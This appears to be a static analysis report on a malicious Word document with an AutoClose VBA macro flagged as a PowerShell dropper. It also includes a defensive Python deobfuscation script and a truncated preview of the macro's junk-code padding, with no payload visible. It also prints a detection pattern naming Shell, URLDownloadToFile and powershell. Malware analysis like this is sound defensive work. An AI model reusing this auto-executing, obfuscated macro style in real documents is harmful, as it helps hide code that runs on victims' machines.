Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6421e023e294d185…

MALICIOUS

Office (OLE)

Size: 222.5 KB
Created: 2018-04-19 18:59:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 824cd3f40fc708abd49ae84f878fd984
SHA-1: 4f6cc57c31c1ba81a718b72b0f04521894573ea6
SHA-256: 6421e023e294d1855a7a17aa76447096406967835bf623302e4b6689f35270af
Risk score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Word document whose VBA project defines an AutoClose procedure. Once macros are enabled, Word runs AutoClose automatically when the document is closed, so the payload fires at a moment the user does not associate with opening an attachment. The previewed portion of the macro is almost entirely junk code: throw-away arrays, arithmetic on constants, and conditions such as If LenB("...") < 83419 Then whose outcome never varies at runtime. This padding exists to defeat signature matching and to bury the real logic, which presumably lies further into the roughly 100 KB of extracted source. The ClamAV detection name 'Doc.Malware.Pwshell-6700199-0' points at a PowerShell payload launched from the Visual Basic stage (T1059.005), although the PowerShell command itself is not visible in the previewed lines.

Heuristics 5

  • ClamAV: Doc.Malware.Pwshell-6700199-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Pwshell-6700199-0. The signature family name points at a PowerShell payload.
  • VBA macros detected (medium, OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code; the decoded source is carved out below as macros.bas.
  • Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
    The VBA project defines Sub AutoClose(). Once macros are enabled, Word runs this procedure automatically when the document is closed, so the payload executes at a moment the user does not associate with opening the attachment.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this heuristic is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution. Note that the generic rule text ("no modern VBA project was recovered") does not apply to this sample: a full VBA project was extracted (see macros.bas), and the AutoClose procedure in it is VBA, not WordBasic. Treat the marker as corroboration of the auto-close trigger rather than as a separate finding.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label records which channel (macro, JS, link annotation, document body, ...) reached it. All three URLs below were found in document text (OLE body):
    • http://schemas.openxmlformats.org/drawingml/2006/main
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml
    These are standard Office Open XML schema namespace identifiers that Word writes into its own metadata. They carry no network-indicator value and should not be added to blocklists or hunted for.
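The junk-code pattern in the extracted macro (throw-away arrays and If LenB("...") < N Then guards whose outcome never changes) is the main obstacle to reading the payload. The Python script below is added here as an illustration; it is not part of the analysis platform's tooling and not code from the sample. It lists the auto-executing procedures in a VBA dump, folds constant Len/LenB comparisons to drop dead branches, and reports which calls remain to be reviewed. It runs on a constructed VBA snippet written in the same style as the macro shown in this report; the CreateObject/Run lines in that snippet are an assumption added so the pass has something to keep, not something recovered from this document. On a real case, feed it the macros.bas that olevba extracted.

```python
import re

# Constructed VBA sample in the style of the macro extracted from this document:
# junk arrays and always-constant If conditions wrapped around a single live
# statement. The CreateObject/Run lines are an assumption added so that the
# junk-removal pass has something to keep; they are not taken from the report.
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Sub AutoClose()
On Error Resume Next
Dim a(5)
If LenB("kEmEVaziqAfyVUgOKJaz") < 83419 Then
a(0) = VarType(Sqr(8341) + CInt("8341"))
If Len("DEsEhIPOmUsuVaQEdApvYKOsIPEkYVaTUcOZACurYk") < Len("wOmAWUHyCEiAGIi") Then
a(3) = Weekday(15927)
End If
End If
Set w = CreateObject("WScript.Shell")
If Len("a") < Len("bb") Then
w.Run "cmd /c echo hypothetical-payload", 0
End If
End Sub
'''

# Procedure names Word and Excel run without an explicit user action.
AUTOEXEC = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+'
    r'(AutoOpen|AutoClose|AutoExec|AutoExit|AutoNew|'
    r'Document_Open|Document_Close|Workbook_Open|Workbook_Close)\s*\(',
    re.IGNORECASE | re.MULTILINE)

# Identifiers worth reading closely once the junk is gone.
SUSPICIOUS = re.compile(
    r'\b(Shell|CreateObject|GetObject|Environ|URLDownloadToFile|powershell)\b',
    re.IGNORECASE)

_LEN_CALL = re.compile(r'^\s*(LenB?)\("([^"]*)"\)\s*$', re.IGNORECASE)
_INT = re.compile(r'^\s*(\d+)\s*$')
_CMP = re.compile(r'^(.*?)\s*(<=|>=|<>|<|>|=)\s*(.*?)$')
_IF = re.compile(r'^\s*If\s+(.*?)\s+Then\s*$', re.IGNORECASE)
_ENDIF = re.compile(r'^\s*End\s+If\s*$', re.IGNORECASE)
_OPS = {'<': lambda a, b: a < b, '<=': lambda a, b: a <= b,
        '>': lambda a, b: a > b, '>=': lambda a, b: a >= b,
        '=': lambda a, b: a == b, '<>': lambda a, b: a != b}


def find_autoexec(src):
    """Names of auto-executing procedures defined in the source."""
    return [m.group(1) for m in AUTOEXEC.finditer(src)]


def _const_value(expr):
    """Integer value of Len("..."), LenB("...") or a bare integer literal, else None.
    VBA stores strings as UTF-16, so LenB of a literal is twice its Len."""
    m = _LEN_CALL.match(expr)
    if m:
        n = len(m.group(2))
        return 2 * n if m.group(1).lower() == 'lenb' else n
    m = _INT.match(expr)
    return int(m.group(1)) if m else None


def fold_condition(cond):
    """True/False for a comparison between two constants, None if not foldable."""
    m = _CMP.match(cond)
    if not m:
        return None
    lhs, rhs = _const_value(m.group(1)), _const_value(m.group(3))
    if lhs is None or rhs is None:
        return None
    return _OPS[m.group(2)](lhs, rhs)


def strip_dead_branches(src):
    """Remove If/End If blocks whose condition folds to False and unwrap those
    that fold to True; nested blocks are handled by recursing into the body."""
    lines, out, i = src.splitlines(), [], 0
    while i < len(lines):
        m = _IF.match(lines[i])
        verdict = fold_condition(m.group(1)) if m else None
        if verdict is None:
            out.append(lines[i])
            i += 1
            continue
        depth, j = 1, i + 1               # locate the matching End If
        while j < len(lines) and depth:
            if _IF.match(lines[j]):
                depth += 1
            elif _ENDIF.match(lines[j]):
                depth -= 1
            j += 1
        if depth:                         # unbalanced (e.g. truncated dump): keep as-is
            out.append(lines[i])
            i += 1
            continue
        if verdict:
            out.extend(strip_dead_branches('\n'.join(lines[i + 1:j - 1])).splitlines())
        i = j
    return '\n'.join(out)


def suspicious_calls(src):
    """Distinct suspicious identifiers that survive junk removal, in order of appearance."""
    seen = []
    for m in SUSPICIOUS.finditer(strip_dead_branches(src)):
        if m.group(1) not in seen:
            seen.append(m.group(1))
    return seen


if __name__ == '__main__':
    print('auto-exec entry points:', find_autoexec(SAMPLE_VBA))
    print(strip_dead_branches(SAMPLE_VBA))
    print('calls to review:', suspicious_calls(SAMPLE_VBA))
```

The pass only folds comparisons whose both sides are string-literal Len/LenB calls or integer literals, which is exactly the shape this macro uses; anything it cannot evaluate is left in place, so a truncated dump or a genuine runtime check is never silently dropped. The Dim lines for the junk arrays survive because they are harmless; what matters is that the nested dead branches disappear and the live CreateObject/Run pair stands out.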

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 100597 bytes
SHA-256: 8408a66982798d02df2c2181b1ea9dba71ea6f11032b7c57f4b15be1ab04ff7c

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const taHuZIFIqEVIDvUfegATUvycUWubu = 0
Sub AutoClose()
On Error Resume Next
Dim auXupOtimVIrigOZoTnAduduHapEpuaELaguzIMe(5)

If LenB("kEmEVaziqAfyVUgOKJaz") < 83419 Then
auXupOtimVIrigOZoTnAduduHapEpuaELaguzIMe(0) = VarType(Sqr(8341) + CInt("8341"))
Dim DEsEhIPOmUsuVaQEdApvYKOsIPEkYVaTUcOZACurYk(5)

If LenB("wOmAWUHyCEiAGIi") < 15927 Then
DEsEhIPOmUsuVaQEdApvYKOsIPEkYVaTUcOZACurYk(0) = VarType(Sqr(1592) + CInt("1592"))
End If
DEsEhIPOmUsuVaQEdApvYKOsIPEkYVaTUcOZACurYk(1) = LTrim("wOmAWUHyCEiAGIi") & "77"
DEsEhIPOmUsuVaQEdApvYKOsIPEkYVaTUcOZACurYk(2) = Day(15921592)

If Len("DEsEhIPOmUsuVaQEdApvYKOsIPEkYVaTUcOZACurYk") < Len("wOmAWUHyCEiAGIi") Then
DEsEhIPOmUsuVaQEdApvYKOsIPEkYVaTUcOZACurYk(3) = Weekday(15927)
End If
End If
Dim aYzYNASEiANesCYFToXYwusCiL(5)

If LenB("aeWoqavaXus") < 33197 Then
aYzYNASEiANesCYFToXYwusCiL(0) = VarType(Sqr(3319) + CInt("3319"))
End If
aYzYNASEiANesCYFToXYwusCiL(1) = LTrim("aeWoqavaXus") & "77"
aYzYNASEiANesCYFToXYwusCiL(2) = Day(33193319)

If Len("aYzYNASEiANesCYFToXYwusCiL") < Len("aeWoqavaXus") Then
aYzYNASEiANesCYFToXYwusCiL(3) = Weekday(33197)
End If
Dim tlIhoKoPaWudITynyhubOBWYGOJELOnypawIhePyiu(5)

If LenB("KYVEZubiJJeFE") < 64511 Then
tlIhoKoPaWudITynyhubOBWYGOJELOnypawIhePyiu(0) = VarType(Sqr(6451) + CInt("6451"))
End If
tlIhoKoPaWudITynyhubOBWYGOJELOnypawIhePyiu(1) = LTrim("KYVEZubiJJeFE") & "11"
tlIhoKoPaWudITynyhubOBWYGOJELOnypawIhePyiu(2) = Day(64516451)

If Len("tlIhoKoPaWudITynyhubOBWYGOJELOnypawIhePyiu") < Len("KYVEZubiJJeFE") Then
tlIhoKoPaWudITynyhubOBWYGOJELOnypawIhePyiu(3) = Weekday(64511)
End If
auXupOtimVIrigOZoTnAduduHapEpuaELaguzIMe(1) = LTrim("kEmEVaziqAfyVUgOKJaz") & "99"
Dim aeMYWYqydezYLANiMusTumuiEvefUEZeraSii(5)

If LenB("iUjeRyhUkkuzyBoQasYq") < 42362 Then
aeMYWYqydezYLANiMusTumuiEvefUEZeraSii(0) = VarType(Sqr(4236) + CInt("4236"))
End If
aeMYWYqydezYLANiMusTumuiEvefUEZeraSii(1) = LTrim("iUjeRyhUkkuzyBoQasYq") & "22"
aeMYWYqydezYLANiMusTumuiEvefUEZeraSii(2) = Day(42364236)

If Len("aeMYWYqydezYLANiMusTumuiEvefUEZeraSii") < Len("iUjeRyhUkkuzyBoQasYq") Then
aeMYWYqydezYLANiMusTumuiEvefUEZeraSii(3) = Weekday(42362)
End If
Dim HEdiZyXezOMopUGsYgOROvAxmFU(5)

If LenB("peMyPaQObuzYpaHAfoKSu") < 93105 Then
HEdiZyXezOMopUGsYgOROvAxmFU(0) = VarType(Sqr(9310) + CInt("9310"))
End If
HEdiZyXezOMopUGsYgOROvAxmFU(1) = LTrim("peMyPaQObuzYpaHAfoKSu") & "55"
HEdiZyXezOMopUGsYgOROvAxmFU(2) = Day(93109310)

If Len("HEdiZyXezOMopUGsYgOROvAxmFU") < Len("peMyPaQObuzYpaHAfoKSu") Then
HEdiZyXezOMopUGsYgOROvAxmFU(3) = Weekday(93105)
End If
auXupOtimVIrigOZoTnAduduHapEpuaELaguzIMe(2) = Day(83418341)
Dim xeZAqiquZIfukodIrQEGHugutuKOKEtE(5)

If LenB("NexUTuhYdEc") < 76205 Then
xeZAqiquZIfukodIrQEGHugutuKOKEtE(0) = VarType(Sqr(7620) + CInt("7620"))
End If
xeZAqiquZIfukodIrQEGHugutuKOKEtE(1) = LTrim("NexUTuhYdEc") & "55"
xeZAqiquZIfukodIrQEGHugutuKOKEtE(2) = Day(76207620)

If Len("xeZAqiquZIfukodIrQEGHugutuKOKEtE") < Len("NexUTuhYdEc") Then
xeZAqiquZIfukodIrQEGHugutuKOKEtE(3) = Weekday(76205)
End If

If Len("auXupOtimVIrigOZoTnAduduHapEpuaELaguzIMe") < Len("kEmEVaziqAfyVUgOKJaz") Then
Dim XbyBERuvOnaJUvyDQseJoZOfAmaXiKa(5)

If LenB("xUFQyTuBItoReaov") < 28739 Then
XbyBERuvOnaJUvyDQseJoZOfAmaXiKa(0) = VarType(Sqr(2873) + CInt("2873"))
End If
XbyBERuvOnaJUvyDQseJoZOfAmaXiKa(1) = LTrim("xUFQyTuBItoReaov") & "99"
XbyBERuvOnaJUvyDQseJoZOfAmaXiKa(2) = Day(28732873)

If Len("XbyBERuvOnaJUvyDQseJoZOfAmaXiKa") < Len("xUFQyTuBItoReaov") Then
XbyBERuvOnaJUvyDQseJoZOfAmaXiKa(3) = Weekday(28739)
End If
auXupOtimVIrigOZoTnAduduHapEpuaELaguzIMe(3) = Weekday(83419)
End If
Dim hIvERpovUDukItICnabyHozUHedudaCuXic(5)

If LenB("xaSISykaKOjuXUcizOqEqip") < 99713 Then
Dim xaMuvakZYBETOpEgEtmoNysoSeABIjESAF(5)

If LenB("BavORoMAmaraHIDEf")
... (truncated)